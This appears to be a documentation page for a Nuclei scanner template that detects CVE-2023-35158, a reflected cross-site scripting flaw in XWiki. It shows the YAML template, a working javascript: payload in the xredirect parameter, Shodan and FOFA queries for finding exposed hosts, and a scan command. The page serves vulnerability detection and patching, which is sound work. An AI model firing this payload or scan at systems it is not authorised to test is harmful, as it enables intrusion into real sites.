Skip to content
Nuclei Templates

XWiki - Cross-Site Scripting

ID: CVE-2023-35158

Severity: medium

Author: ritikchaddha

Tags: cve,cve2023,xwiki,xss

Description

Section titled “Description”

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It’s possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.

YAML Source

Section titled “YAML Source”
id: CVE-2023-35158


info:
  name: XWiki - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
  impact: |
    Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update XWiki to the latest version to mitigate the Reflected XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35158
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-35158
    cwe-id: CWE-87
    epss-score: 0.62633
    epss-percentile: 0.97829
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query:
      - "XWiki"
      - xwiki
      - http.html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2023,xwiki,xss


http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210094676e26c77c925bccda3431669f8e6787fa583f7adeede4fb82106cf544552d0220667d2cc29355ad33e104d787be2389c20c45c22ae236b6d5401948303e98fa6e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-35158.yaml"

View on Github